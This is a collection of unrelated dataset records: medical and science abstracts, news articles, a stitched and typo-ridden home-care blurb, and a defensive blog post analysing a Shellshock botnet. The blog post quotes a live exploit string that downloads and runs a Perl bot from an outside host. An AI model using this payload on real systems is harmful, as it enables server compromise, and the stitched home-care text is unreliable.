citizens. Gary Fer one, the owner fo this organisation always makes sure that his team members provide the elders with utmost safety and comfort in their own hone. They do not have to go to any hospitals or old age homes in order to live safely and peacefully. Assisting Hands home Care and its efficient an compassionate team members are skilled enough to handle every kinds of health issues of the elders. The professionals can take good care of the requirements of your loved ones. So, be in good hands with Gary Fer one and his team. There are many elderly patients who are benefited from the home care options. It is suitable for the elders who need only assistance with getting physical exercise, for preparing meals, and bathing. But, for some elders, the condition is very serious and they need several types of medications every day. So for that kind of elders, home care alone is not the right choice. They also require home health care services for assisting them with other daily treatments and therapies. It can help the individuals to improve function and to live with greater independence. Health Care Services and its Types. The home health care environment is entirely different from hospitals and any other environments. A patient can receive many number of home health care services at their home. It always depends on the individual patient’s situation. Usually, your care plan and the services that you need at home is determined by the doctor. The services may include: A doctor may visit the patient’s home to diagnose the illness and to give suitable treatment for it. The doctors may also every so often review the home health care requirements. The common home health care service that are given to the patients is; the nursing care depending on their requirements. After consulting with the doctor, they may set up a plan of care which includes wound dressing, intravenous therapy, monitoring the health of the patients, and so on. Some patients may require help to perform their daily duties and to improve their speech after an illness. A physical therapist can handle this case by planning properly to help them to regain. How the patients are helped with the occupational therapist? The patients can improve their physical developments, social, and emotional disabilities with the help of occupational therapist. A speech therapist may help the patients to develop their ability to communicate clearly. The other types of services include; helping them with basic personal needs like getting out of bed, walking, bathing, and so on. Training to the home health aids is also given under the supervision of the nurse. When beginning an exercise program, it is very important to pace yourself and not risk injury by overexerting yourself from the get go especially if it has been a while since you worked out. Start slow: Do not just jump right in and start exercising five days a week because that is a recipe for disaster and it is better that one gradually work up to exercising several days per week while he or she see how the body responds. Know when to stretch: Stretching right before a workout can seem like the best thing to do but one might be putting himself or herself at risk of injury. Mix it up: Whether one is going for weight loss or bulking up, a mixed regimen of aerobic and strength training is the best way to achieve the body he or she wants but even within those categories, donot stick to the same exercises every day. Know theweight and the right way to use it: Most people are confused the first time they walk into a gym but are afraid of asking for advice. Know when to take a break: When people start out, they are often overzealous and try to get to the gym every day and by not letting the body rest, he or she can be doing much more harm than good An aneurysm is a very weak point in an artery and it most commonly occur in the arteries of the brain or in the body’s largest artery which is the aorta. An aortic aneurysm can be in the chest which is a thoracic aortic aneurysm or in the abdomen which is an abdominal aortic aneurysm. Most people with an aneurysm do not even know they have one and if the aneurysm grows large enough, the artery wall may become so thin that blood begins to leak into the wall of the blood vessel which is also known as dissection or out into neighbouring tissues or parts of the body. When the brain is deprived of blood and therefore oxygen, a stroke results and an accumulation of blood from a leaking brain aneurysm can press on areas of the brain causing brain damage. When an aortic aneurysm leaks or ruptures, severe bleeding which is also known as haemorrhage may occur and this is a medical emergency that requires immediate attention. Other groups who have a high risk of developing an aneurysm include people who smoke, have a family history of aneurysm, have high blood pressure and have atherosclerosis which is blocked and weakened blood vessels, have untreated syphilis, have infections, have injuries, etc.
null
minipile
NaturalLanguage
mit
null
Crystal structure of the lactose operon repressor and its complexes with DNA and inducer. The lac operon of Escherichia coli is the paradigm for gene regulation. Its key component is the lac repressor, a product of the lacI gene. The three-dimensional structures of the intact lac repressor, the lac repressor bound to the gratuitous inducer isopropyl-beta-D-1-thiogalactoside (IPTG) and the lac repressor complexed with a 21-base pair symmetric operator DNA have been determined. These three structures show the conformation of the molecule in both the induced and repressed states and provide a framework for understanding a wealth of biochemical and genetic information. The DNA sequence of the lac operon has three lac repressor recognition sites in a stretch of 500 base pairs. The crystallographic structure of the complex with DNA suggests that the tetrameric repressor functions synergistically with catabolite gene activator protein (CAP) and participates in the quaternary formation of repression loops in which one tetrameric repressor interacts simultaneously with two sites on the genomic DNA.
null
minipile
NaturalLanguage
mit
null
Noted gun violence researcher Dr. Garen Wintermute, of the UC Davis Violence Prevention Research Program, says a just released study that implies that gun laws save lives is inconclusive. The study, by Dr. Eric Fleegler of the Boston Children’s Hospital, was released in the online version of the Journal of the American Medical Association. It looked at the number and strength of gun laws in each state and compared them the number of firearms fatalities. There is a correlation. “What they found was that the more laws a state has on balance lower was its firearm mortality rate,” said Wintermute. But he also said there is no evidence that gun laws were responsible for fewer gun deaths. “The fact that two things are present at the same time doesn’t mean one of those things caused the other,” said Wintermute.
null
minipile
NaturalLanguage
mit
null
Prevention of acute rejection episodes with an anti-interleukin 2 receptor monoclonal antibody. I. Results after combined pancreas and kidney transplantation. A prospective, randomized trial was conducted to evaluate the short-term and long-term effects of induction immunosuppression with the rat IgG 2a monoclonal antibody 33B3.1, directed against the human alpha chain of the interleukin 2-receptor, following primary, cadaveric, combined pancreas and kidney transplantation. Forty patients were randomly assigned to receive 10 mg/day of 33B3.1 (n = 20) or 1.5 mg/kg/day of rabbit antithymocyte globulin (n = 20) for the first 10 postoperative days. Azathioprine, low-dose corticosteroids, and cyclosporine were given in association with either 33B3.1 or ATG. All 40 patients received the entire 10-day bioreagent course and no episode of rejection was observed during this period. Although the incidence of rejection did not significantly differ within the first, second, and third postoperative months (ten 33B3.1 and 6 ATG patients experienced, respectively, 10 and 6 rejection episodes within the first 3 months), the total number of 33B3.1 patients experiencing rejection throughout the follow-up was significantly higher than that of ATG (13 versus 6; P < 0.02). Immunological graft failure accounted for 2 pancreas and 2 kidney losses in the 33B3.1 group versus 1 in the ATG one (P = ns). The total number of infectious episodes was similar in both groups (21 versus 23). Two malignancies were observed in the ATG group (1 responsible for patient's death). One 33B3.1 patient died because of infectious pneumonia and 3 ATG patients died because of 2 cardiovascular diseases and 1 cancer. All patients had functioning grafts at the time of death. The 3-month and 36-month patient, pancreas, and kidney actuarial survival rates were, respectively, 100, 65, and 100%, and 95, 50, and 82% in the 33B3.1 group and 95, 80, and 90%, and 80, 70, and 80% in the ATG one (P = ns). These data suggest that, although a significantly higher rejection episode incidence was observed in patients treated with 33B3.1 monoclonal antibody as compared with ATG, similar long-term results can be obtained following primary cadaveric combined pancreas/kidney transplantation.
null
minipile
NaturalLanguage
mit
null
1. Introduction {#sec1} =============== Pathological gambling (PG) has been recently added as a gambling disorder to the substance-related disorders chapter of DSM 5 \[[@B1]\], as a result of the empiric findings provided by the research literature supporting its similarity with substance use disorders (SUD). Indeed, it has been shown that PG shares clinical expression, comorbidity, neurobiological mechanisms \[[@B2]--[@B5]\], and treatment options \[[@B6]--[@B8]\] with SUD and reward-related behaviors. PG harm related to its high psychiatric comorbidity, mostly substance use disorders \[[@B9]\] and increased suicidal risk \[[@B10]\]. Vulnerable subgroup populations such as adolescents are also affected by gambling disorders \[[@B11]\]. Prevalence rates in the general population range are ranging from 0.2% to 2.1% \[[@B12]--[@B14]\] for pathological gamblers and from 0.6% to 5.5% for problem gamblers \[[@B13], [@B15]--[@B18]\]. The prevalence seems to be more important (6.2%) in primary care services \[[@B19]\]. Problem gamblers are hard to attract to treatment programs, partly due to their feelings of shame and denial \[[@B20]\]. Only 0.4% to 3% of them seek help for their difficulties \[[@B21], [@B22]\] and a five-year latent period is observed between the first symptomatic presentation and the first attempt to seek care \[[@B23]\]. Hence, general practitioners (GPs) as primary care providers have a crucial role to play in the early detection and intervention on problem gambling (PrG) \[[@B24], [@B25]\]. There is a paucity of studies on the PrG management resources and screening practices of GPs. Fourteen years ago, in Canada, a structured national plan was designed to evolve physicians in PrG management \[[@B26]\]. The needs (PrG resources available and awareness on their existence) were studied in a sample of 54 physicians from the 800 contacted. Results showed a low awareness on PrG resources that have been considered by participants insufficient to fulfill the needs \[[@B26]\]. Concern about the lack of knowledge, education, and training in PrG and its perception as a nonmedical problem but rather as a character defect was raised as challenges and obstacles to GPs\' evolvement in PrG management \[[@B26]\]. An Australian paper \[[@B24]\] presented the way GPs can help in early detection and intervention and reported a pilot project that provided resources to GPs. Results from the 24 GPs (with referral experience in PrG) from the 51 that received information and material on PrG (e.g., importance, list of referral services, and simple advice on the way to assist patients). The majority of participants were convinced of the role they can play in PrG management \[[@B24]\]. However, lack of knowledge was reported by almost half of the sample (even if they had referral experience in the field) and a difficulty to ask patients "out of the blue" if they gamble \[[@B24]\]. Another awareness study of PrG in 180 health care providers (nurses, physicians, and social workers) \[[@B27]\] showed that the vast majority are aware of the existence of PrG but only a minority are effectively screening their patients. Screening for health problems in care providers themselves is not a frequent question. Regarding PG, a prevalence rate in American general practitioners of 5% has been reported \[[@B28]\]. This study aims first to evaluate interest and knowledge of GPs regarding PrG and the way they deal with it in their daily clinical practice. Secondly, it aims to screen for PrG in GPs themselves. 2. Methods {#sec2} ========== 2.1. Sample {#sec2.1} ----------- Swiss GPs with a medical practice in the 6 French-speaking areas (FSAs) of Switzerland were invited to participate anonymously in an online survey. Participants were recruited between March and May 2011 via their physician\'s regional association through an e-mail informing about the study\'s aims. The participants were directed through a web link to the questionnaire. 2.2. Measures {#sec2.2} ------------- A 24-item online questionnaire was developed for the study on Survey Monkey software. After sociodemographic data ([Table 1](#tab1){ref-type="table"}), five items investigated participants\' beliefs on PrG ([Table 2](#tab2){ref-type="table"}). Then, participants were asked about their PrG screening practice ([Table 3](#tab3){ref-type="table"}). They were presented a text-response item (to avoid oriented responses) to specify the PrG screening tools they use. They were also invited to estimate the rate of PrG and related debts issues in their active pool of patients. Practitioners were then asked how they manage PrG and its financial consequences in their patients ([Table 3](#tab3){ref-type="table"}). The last section of the questionnaire consisted of items on the participants\' impression about their knowledge of PrG disorder, on the existing specialized local treatment network, and their estimated need for information and training ([Table 4](#tab4){ref-type="table"}). At the end of the questionnaire, responders were themselves screened for PrG, using the 2-item Lie-bet test \[[@B29]\] "*Have you ever felt the need to bet more and more money?"* and*"Have you ever had to lie to people important to you about how much you gambled?"* ([Table 5](#tab5){ref-type="table"}). 2.3. Statistical Analysis {#sec2.3} ------------------------- SPSS 18.0 (Statistical Package for the Social Sciences, IBM Inc., Chicago) software program was used to perform the statistical analyses. First, descriptive statistics were computed for the participants\' characteristics (demographics and beliefs representation) and reported as medians, ranges, and percentages. For the sake of completeness, missing data are also provided in the tables. Next, we looked for associations between screening frequency and GPs\' interest in PrG, between knowledge of PrG, respectively, knowledge of PrG network, and screening practice for PrG, and finally between the need for information/training on PrG and knowledge of the topic, using the Pearson chi-square tests. When the expected frequency criteria were not met due to small cell sample size, adjacent categories were collapsed into smaller categories, where appropriate, in order to fulfill the necessary Pearson chi-square requirements and to gain statistical power. Two-by-two tables that did not meet these requirements were analyzed by the Fisher exact tests. Hence, for instance, knowledge of the topic reduces to two categories: very satisfactory/satisfactory versus insufficient/no knowledge. The same is the case for screening for excessive gambling frequency (systematically/often versus rarely/never) and demand for more information and training (total agreement/partial agreement versus partial disagreement/total disagreement). 3. Results and Discussion {#sec3} ========================= The survey was relatively well received by Swiss GPs\' professional associations in the French speaking area with 66% of acceptance to relay the information and the link to the online questionnaire. The sample consisted of 71 GPs accepting to participate in the survey. A majority of them (95.8%) filled out the questionnaires. Respondents were mostly men (63.2%), with a median age of 53 years and a median practice experience of 17 years as GP ([Table 1](#tab1){ref-type="table"}). The vast majority is qualified specialists in primary care (general practitioner and/or internist) and their area of practice is given in [Table 1](#tab1){ref-type="table"}. When GPs were asked to estimate PrG rate in their active pool of patients, more than half of them did not answer and 11% declared not knowing this rate, while 24% of them estimated this rate (between 1 and 30%). 3.1. GPs\' Beliefs on PrG and Financial Debts {#sec3.1} --------------------------------------------- The great majority (99%) expressly recognized believing in the potential addictive properties of gambling and 69% of them showed a keen interest in PrG with all the subsequent financial harm ([Table 2](#tab2){ref-type="table"}). Two-thirds of them (62%) characterized PrG as an important or very important issue of concern in the French-speaking area of Switzerland. The whole sample agreed that gambling could lead to indebtedness and 89% agreed with the worsening of indebtedness related to excessive gambling. 3.2. GPs\' Attitudes towards PrG {#sec3.2} -------------------------------- In their daily practice, while debts were often or systematically screened by 35% of the practitioners, PrG was screened only by a minority (7%) of them ([Table 3](#tab3){ref-type="table"}). Screening habits were during general history taking or PrG being discovered by chance with the occurrence of payment difficulties. There was no relationship found between screening frequency and GPs interest in it (*P* = 1). Investigating PrG management, 52% of GPs referred their patients to a specialist and 7% treated it themselves, while 32% stated they do not know what to do with these problematic patients and 3% do not address this issue at all ([Table 3](#tab3){ref-type="table"}). GPs promote a specialized approach to PrG treatment, in multidisciplinary centers (80%) and by private psychiatrists (3%). In debt management, GPs seemed to be more active than for PrG, with a greater rate of them treating it themselves (21%) and a lesser rate of "I do not know" (10%) responses. 3.3. Self-Reported Knowledge of PrG {#sec3.3} ----------------------------------- Participants estimated their knowledge of PrG and on specialized care network as being null (resp., 14% and 25%) or unsatisfying (resp., 65% and 45%) ([Table 4](#tab4){ref-type="table"}). This was found to be independent of their screening practice for problem gambling (resp., *P* = 0.2 and *P* = 0.1). The majority of participants reported a need for information (86%) and for training (77.5%) on PrG ([Table 4](#tab4){ref-type="table"}). This need was found to be independent of how satisfied they felt about their feeling as satisfied or not from their knowledge of the topic (*P* = 0.5). One participant screened himself positive for problem gambling according to Lie-bet items \[[@B29]\]. In summary, data showed that the majority of GPs considered gambling addictive and they believed in the importance of problem gambling in their area of practice, estimating furthermore a high rate of PrG and related indebtedness in their own patients. These results are different from those of the Canadian sample of physicians in 2000 \[[@B26]\] but similar to those from the Australian data in 2007 \[[@B24]\]. This highlights the possible mentality changes this last decade regarding PrG status as a medical disorder and constitutes a better chance for GPs to be motivated to play a role in its management. Nevertheless, screening practice was very low and PrG was often discovered by chance when patients experienced financial issues. In addition, GPs interested in PrG did not differ significantly in screening from those who declared less or no interest in the field. This could be explained by the gap between beliefs and attitudes in a real practice setting. Even if GPs believe and take interest in PrG, they probably tend to prioritize managing other disorders (i.e., somatic and/or with short- or medium-term vital risk). They could also feel a lack of time in their consultation to include questions on PrG \[[@B30]\]. This goes in line with the obstacles stated in recent literature to be facing GPs\' evolvement in PrG screening (e.g., "lack of time" and "PrG considered as a new problem having a low incidence") \[[@B26]\]. GPs could interest in PrG but could lack suitable and available resources and knowledge on PrG care management. The economically symptomatic PrG (i.e., patient declaring financial issues or incidents of fee payment issues) could be a sign of alert of the disorder for the practitioner, but unfortunately financial consequences are already present. This aspect could be addressed by renewed information on the vital risk of PrG (e.g., suicidal risk) and the importance of the early detection. GPs should also be trained and continuously trained to use basic and suitable PrG screening tools to detect patients before crisis-driven help seeking. GPs in the present work experienced to be screened for PrG using the Lie-bet items. This could have led to an awareness of an existing short and easy screening tool they can use in their daily practice. Another contrast between GPs beliefs and attitudes regarding PrG is that even if the majority of GPs knew the best treatment approach as being multidisciplinary, only half of them referred to these kinds of treatment systems. The poor knowledge reported on the specialized local treatment network could explain these findings. This aspect could be addressed by a wider dissemination, through GPs professional associations, of the current accessible information about PrG local treatment systems. Internet could be an interesting, fast, cost-effective, and easy-to-use vector for such information and training dissemination. Several countries have specific web-based information on PrG including information on the local and national specialized treatment centers (i.e., <http://www.sos-jeu.ch/>, <http://www.jeu-aidereference.qc.ca/>, and <http://www.problemgamblingguide.com/>). One possible intervention by GPs once patients screened could be a brief counseling consisting in the recommendation to their patients to visit such web pages to get information on the disorder and the specialized ways of help they could seek. Several medical associations have developed specific material targeting GPs to help them inform their patients on gambling and how to manage PrG in general practice \[[@B24]\]. Since problem gamblers seem to be more likely to accept help from their general practitioner regarding this disorder \[[@B31]\], pharmacotherapy for PrG \[[@B6]--[@B8]\] could be an interesting option as it fits with a general practice setting. A large number of participants stated themselves (79%) as dissatisfied with their knowledge of the disorder and the referring structures and the large majority of the sample declared needing more information (86%) and training (77.5%) on PrG and its management. This is a need that should be addressed by structured specific training and support strategies. Helplines for GPs and supervisions should be considered in addition to specifically designed training materials and settings (i.e., pregraduate, postgraduate, and continuous training). E-learning and distance supervisions (e.g., through e-mails or videoconferences) are emerging tools to build capacity that demonstrated efficacy in other fields in medicine web-platforms dedicated to map and to inform professionals on the tendencies on some addictive behaviors are currently developing \[[@B32]--[@B35]\]. The high rate of missing data concerned electively the second part of the questionnaire based on attitudes and knowledge. Taking into account that most of the participants answered to the beliefs, this could be explained by social desirability (i.e., difficulty to report the ignorance on a topic). With the lack of information on the rate of participants from the panel sought (unknown proportion of affiliated doctors in each professional association at the time of the study), the representativeness of the sample here studied is hard to describe. Furthermore, the only data available is the number of 1183 of Swiss doctors (including GPs) in outpatient sector of the geographic areas concerned by our survey \[[@B26], [@B27], [@B36]\]. Another limitation of this work is the predictable lack of statistical significance in the associations testing between beliefs and attitudes due to the small sample size and the missing data. However, descriptive data is the most important contribution of our work. Validity of our results can be appreciated by some indirect indicators. Firstly, data on GPs\' attitudes of PrG screening and knowledge are in line with previous studies \[[@B24]\]. Secondly, the proportion of probable PrG in the sample itself (1.5%) was situated in the range of the general Swiss population prevalence \[[@B15], [@B17]\]. Finally, even if the sample is moderate, a wide age range (34--70 years old) of GPs was represented. Participants, having done their medical studies at different periods in time, represent the panel of different considerations of the PrG as a disorder for the medical community in the last decades. To our knowledge, this is the first study specifically targeting GPs (regardless to their PrG referral experience) to investigate their beliefs, resources, and practice related to PrG, above all, in the era of an expanding offer of online gambling. 4. Conclusion {#sec4} ============= The results state that the vast majority of Swiss GPs that participated in the study are aware of the existence and the potential impact of PrG on their patients. But, as expected, the screening of PrG is not systematic and their knowledge of adequate treatments or referral methods is scarce. The discrepancy between beliefs in the harm related to PrG and the lack of its management could be addressed by information, training, and support for general practitioner. The implementation and success of such plan will be facilitated as GPs specifically stated this need. GPs being central to health screening in general and the pressure on them to screen almost all health issues, targeted advice and training (e.g., short screening tools, better knowledge of when to refer to a specialist, and effective pharmacotherapy strategies) should be promoted to empower the GP\'s management skills in the context of a public health approach. This training and information should be periodically renewed to face new challenges (e.g., Internet as a vector of gambling accessibility but also information and training vector) and to know new management strategies. Our findings can be the first stepping stone in the implementation of such capacity building strategy for PrG early detection and intervention according to the local context. Indeed, concrete tracks can be designed starting from this inventory of representations, knowledge, practice habits, and needs. Such strategy could be inspired by previous afterthoughts \[[@B24]--[@B26]\]. This study may have served as a brief intervention to remind the existence and the harms of this disorder. Screening problematic gambling in GPs themselves could have been a novel way to make them aware of possible simple and fast screening tools. The goal of enabling general practitioners is to improve the early detection of problem gamblers and to increase their treatment seeking. This survey benefited from a grant from Le Programme Intercantonal de Lutte contre la Dépendance au Jeu (PILDJ) 2011 that the authors thank for its support. They also thank the general practitioners associations of Suisse Romande for their support in the inclusions by disseminating information on the survey within their members. FSAs: : French-speaking areas GPs: : General practitioners PG: : Pathological gambling PrG: : Problem gambling. Conflict of Interests ===================== The authors declare that there is no conflict of interests regarding the publication of this paper. ###### Sociodemographic data. Total sample (*N* = 71)   ---------------------------------------------- ------------- Age (years), median (min--max) 53 (34--71) Gender, *n* (%)    Female 25 (35.2)  Male 43 (60.6)  Missing 3 (4.2) Practice duration (years), median (min--max) 17 (1--38) Medical specialization, *n* (%)    General practitioner 33 (46.5)  Internist 33 (46.5)  General practitioner and internist 1 (1.4)  Internist and other 3 (4.2)  No specialization 1 (1.4) Area of practice, *n* (%)    Fribourg 1 (1.4)  Geneva 31 (43.7)  Jura 0 (0)  Neuchâtel 23 (32.4)  Valais 0 (0)  Vaud 16 (22.5) ###### Participants beliefs on excessive gambling. Total sample (*N* = 71) *n* (%) ------------------------------------------------------------------------------- ----------- In your opinion, excessive gambling in Swiss French-speaking area is    Not an issue 0 (0)  A minor issue 18 (25.4)  A major issue 41 (57.7)  A very major issue 3 (4.2)  I do not know 9 (12.7) Your interest in excessive gambling and gamblers\' indebtedness is    Important 11 (15.5)  Medium 38 (53.5)  Low 18 (25.4)  Null 2 (2.8)  I do not know 2 (2.8) Do you think gambling could become excessive or addictive    Total agreement 66 (93.0)  Partial agreement 4 (5.6)  Partial disagreement 0 (0)  Total disagreement 0 (0)  I do not know 1 (1.4) Do you think gambling could lead to indebtedness    Total agreement 69 (97.2)  Partial agreement 2 (2.8)  Partial disagreement 0 (0)  Total disagreement 0 (0)  I do not know 0 (0) Does excessive gambling worsen indebtedness in the current economical context    Total agreement 45 (63.4)  Partial agreement 18 (25.4)  Partial disagreement 2 (2.8)  Total disagreement 0 (0)  I do not know 5 (7.0)  Missing 1 (1.4) ###### Participants attitudes towards excessive gambling. Total sample (*N* = 71) *n* (%) ------------------------------------------------------------------------------------- ----------- Do you screen for excessive gambling    Systematically 0 (0)  Often 5 (7.0)  Rarely 25 (35.2)  Never 22 (31.1)  I do not know 1 (1.4)  Missing 18 (25.4) Do you screen for indebtedness    Systematically 1 (1.4)  Often 24 (33.8)  Rarely 24 (33.8)  Never 6 (8.5)  I do not know 2 (2.8)  Missing 14 (19.7) Your attitude towards excessive gambling is    I refer to specialist 37 (52.1)  I treat it 5 (7.0)  I do not do anything 2 (2.8)  I do not know 22 (31.8)  Missing 5 (7.0) Your attitude towards indebtedness is    I refer to specialist 34 (47.9)  I treat it 15 (21.1)  I do not do nothing 3 (4.2)  I do not know 7 (9.9)  Missing 12 (16.9) The best management of excessive gamblers is in referral to    Specialized multidisciplinary centers (doctors, psychologists, and social workers) 57 (80.3)  Private psychiatrists 2 (2.8)  General practitioners 3 (4.2)  Social services 1 (1.4)  Other 3 (4.2)  I do not know 2 (2.8)  Missing 3 (4.2) ###### Self-reported knowledge of problem gambling. Total sample (*N* = 71) *n* (%) -------------------------------------------------- ----------- My knowledge of problem gambling is    Very satisfying 0 (0)  Satisfying 12 (16.9)  Dissatisfying 46 (64.8)  Null 10 (14.1)  I do not know 0 (0)  Missing 3 (4.2) My knowledge of problem gambling care network is    Very satisfying 0 (0)  Satisfying 15 (21.1)  Dissatisfying 32 (45.1)  Null 18 (25.4)  I do not know 3 (4.2)  Missing 3 (4.2) I desire more information about problem gambling    Total agreement 39 (54.9)  Partial agreement 22 (31.0)  Partial disagreement 3 (4.2)  Total disagreement 2 (2.8)  I do not know 1 (1.4)  Missing 4 (5.6) I desire more training on problem gambling    Total agreement 19 (26.8)  Partial agreement 36 (50.7)  Partial disagreement 6 (8.5)  Total disagreement 3 (4.2)  I do not know 1 (1.4)  Missing 6 (8.5) ###### Screening for PrG in participants. Total sample (*N* = 71) *n* (%) -------------------------------------------------------------------------------- ----------- Have you ever felt the need to bet more and more money    Yes 1 (1.4)  No 67 (94.4)  I do not know 0 (0)  Missing 3 (4.2) Have you ever had to lie to people important to you about how much you gambled    Yes 0 (0)  No 68 (95.8)  I do not know 0 (0)  Missing 3 (4.2) [^1]: Academic Editor: Giovanni Martinotti
null
minipile
NaturalLanguage
mit
null
Update: On January 22, 2018, President Trump approved a 30 percent tariff on imported solar panels, which will eventually decrease to 15 percent. Suniva was once among the top solar panel manufacturers in America. Then, in April, the Georgia company declared bankruptcy. A few days after, it revealed why: Foreign governments, like China, had subsidized competing solar cell manufacturers abroad, undercutting Suniva's prices. The company outlined its tale of woe in a petition filed that month with the US International Trade Commission calling for strong tariffs against foreign manufacturers. A few weeks later, another US manufacturer, Oregon's SolarWorld, joined the petition. And on Tuesday, August 15, the plaintiffs made their case to the ITC: Since 2012, foreign competition has cost the US solar industry 1,200 jobs and a 27 percent drop in wages. The tariff, they argued, would help create 115,000 to 144,000 jobs by 2022. View more But much of the rest of the US solar industry finds those figures far-fetched, and calls the tariff a terrible idea. See, manufacturing remains a small part of the US solar power industry. Most of the money—and work—lies in assembling panels into arrays and installing them for large corporate or industrial-scale clients (residential rooftop setups are small potatoes). Opponents of the tariff argue it would raise the material costs of generating solar electricity just as it is becoming cheap enough to compete with fossil fuels. Extend that logic, and the tariff threatens to curb an important contributor to the nascent clean energy boom. So no, this isn't your average trade dispute. Starting with the tariff's origin story. When Suniva filed for bankruptcy, it still had a chance to survive. But the company needed money to ride out the rough patch. One investor, the New York firm SQN Capital, offered $4 million credit ... if Suniva complained to the ITC about artificially cheap solar panels imported from abroad. On the surface, this sort of makes sense. SQN Capital had already sunk tens of millions into Suniva. If US panel manufacturing rebounded, the company could recoup some of its investment. But then there's the fact that SQN Capital wrote a letter to the Chinese Chamber of Commerce implying that $55 million would make the tariff request go away. More on that later. First, the tariff petition. It offers a two-pronged strategy to protect domestic solar panel manufacturing. The first part requests that any imported crystalline-silicon (one of several panel chemistries) solar panels see an added charge of 40 cents-per-watt. The second part sets a minimum price of 78 cents per watt for any imported panel. That might sound redundant, but it's meant to ensure that foreign subsidies don't make an end run around that 40 cent duty. The 78 cent price floor also effectively guarantees that domestic crystalline-silicon solar cells earn a healthy profit without having to worry about foreign competition. That's because, according to a Stanford University study, the average cost—which includes variable expenses like materials, labor, utilities, engineering, and administration—of making such a panel is below 40 cents per watt. Sure, other countries do it cheaper. Figuring out why is dicey. Do Chinese solar power manufacturers receive government subsidies? Of course. But so do US solar companies: SolarCity got $750 million from New York for its yet-to-open factory in Buffalo. “It comes down to the question of what does a thing cost a manufacturer to make, and what counts as product dumping,” says Stefan Reichelstein, faculty director of the Sustainable Energy Initiative​ at Stanford University and co-author of the study. Related Stories Green Energy Tesla Is Turning Kauai Into a Renewable Energy Paradise The power grid of the future will require sunny skies above and energy storage below. Thanks to Tesla, Kauai has both. energy Rooftop Solar Panels Are Great for the Planet—But Terrible for Firefighters New training and fire codes are supposed to make firefighters safer when they run into solar panels, but they're inconsistently applied. energy Three Ways to Bring Solar Power to the People Who Need It Most The cost of solar panels can put them out of reach for many families. But organizations are finding new ways to bring solar to low-income households. Good luck finding irrefutable evidence that the Chinese government unfairly subsidizes Chinese manufacturers. But even if that did happen, a tariff on their products wouldn't be a decisive economic coup. Manufacturing is not the backbone of the US solar industry. “When I finance a solar array, I am paying for not just the solar cells, but a lot of civil engineering, bulldozers, steel, and other additional resources. To do that, I have to outcompete not only solar projects, but other sources of generation,” says Colin Murchie, an expert in corporate and institutional-scale solar project planning for Sol Systems. You can credit those large-scale operations for most of recent solar energy demand. Last year, solar accounted for more than one-third of all newly installed electricity generation in the US. And solar's rising popularity is closely tied to its plummeting costs. Cut-rate panels from places like China are a big factor for those conjoined trends. Which is why a study by GreenTechMedia, a renewable energy news and analysis organization, reported that the proposed tariff would erase two-thirds of expected solar installations over the next five years. The Solar Energy Industries Association framed the tariff's effects in terms of jobs. Namely, kiss 88,000 of them goodbye. And yes, that would affect manufacturing, too. After GreenTechMedia published its study, Suniva and SolarWorld commissioned their own investigation of the tariff's effects. By correcting purported flaws in GreenTechMedia's methodology, the two companies say the tariff will create 115,000 to 144,000 US jobs in the next five years—44,000 of them in manufacturing alone. An ambitious figure, given the solar industry currently employs about 260,000 people (19 percent of whom work in manufacturing). Which study the ITC commission favors remains anyone's guess. But that's not all it has to chew on. Remember that letter from SQN Capital thing? Well, back in May, the president of SQN Capital—the company that lent Suniva $4 million and demanded it petition for tariff protections—wrote a letter to the Chinese Chamber of Commerce. It was unsubtle: Buy $55 million worth of Suniva's equipment, and SQN Capital would withdraw its money from Suniva, and the solar company would have to abandon its tariff request. Why $55 million? Well, that would allow SQN to recover the $51 or $52 million (including that $4 million loan) it sunk into Suniva over the years. Such an offer isn't against the law. But it does raise many questions about the motive behind the tariff petition. The rival sides saw each other in court on August 15—for 10 hours—and the ITC commission is set make its call in about a month. On one hand, the exorbitant duty request, overwhelming opposition from the US solar industry, and a possible shakedown seems like a serious tarnish on the tariff petition. On the other, a clean industry-crippling punishment for Chinese imports fits nicely within the federal government's "America First" energy plan. Nothing is certain, even on the sunniest days.
null
minipile
NaturalLanguage
mit
null
Anatomy of a Shellshock botnet Share Short URL Shellshock (aka Bashdoor) is a family of security vulnerabilities disclosed on September 24 that affected the very popular Bash shell. The first bug discovered, caused Bash to unintentionally execute commands when they were concatenated to the end of function definitions stored in the values of environment variables. Within days of the publication of this, intense scrutiny of the underlying design flaws discovered a variety of related vulnerabilities, which were addressed with a series of patches. (image by Aaron Kondziela under CC BY 4.0) Attackers exploited Shellshock within hours of the initial disclosure by creating botnets of compromised computers to perform distributed denial-of-service attacks and vulnerability scanning. Our business is server management and monitoring, so naturally we were bound to witness some of these attacks. Of course, our own servers were patched within hours of the announcement. That, however, didn’t stop people from launching the attacks. We take security very seriously and every exception that happens in Mist.io is documented and sent to our security team. On September 29, we started seeing several “HTTPNotFound: /cgi-bin/bash” exceptions and although our servers were patched, we decided to look into it and try to figure out what the attack plan was. This is what we were looking at: Sep 29 2014, 20:18 UTC HTTP GET (from 174.143.168.121) path_info: /cgi-bin/bash user_agent: () { :;}; /bin/bash -c "wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache" Naturally, our first step was to take a look at that legend.txt script. Well, it turns out it was a perl script used to scan for vulnerabilities and connect the compromised server to a command and control IRC server. Eventually, it tries to set up a SOCKS5 server (mocks) and if it succeeds, it sends the connection url via a private message in IRC. Next step was to connect to that IRC server. At the time, 272 infected servers were connected to the IRC #apache channel with nicks like APACHE-4366394. There were 3 admins online, one of them using the very unique and modest nickname “god”. We chased the IP addresses of the admins, but as expected that did not yield any significant results. The IRC server’s IP originated in a Slicehost pool, and soon enough, that server was going down. As the compromised servers were connected directly to the IRC server, we decided to collect their IP addresses, try to find their respective owners and inform them that their servers have been compromised. Being the only non-bot users on that IRC channel, the operator kept kicking and banning us. Well, kick banning did not work in the 90’s, it sure wasn’t going to work now. After collecting the infected IPs, we started doing reverse lookups. Fortunattely, none of the IPs seemed to be high-profile targets like Yahoo. In the end of the day, we informed the hosting companies and eventually got to some of the owners. At least our efforts did not go in vain. Overall, it seemed like a pretty standard type of attack that would have been prevented if the compromised servers had been properly patched. Keep in mind that it had already been five days since the disclosure of Shellshock and it was featured in all major news networks. Even if your server’s data are not important or it is a test server that you don’t care about, leaving it unpatched can make it part of a larger DDOS attack. Keeping your machines updated is crucial in fighting off the creation and expansion of malicious botnets. Do you have machines across clouds and want to easily manage them? Sign up for Mist.io and try it for free!
null
minipile
NaturalLanguage
mit
null
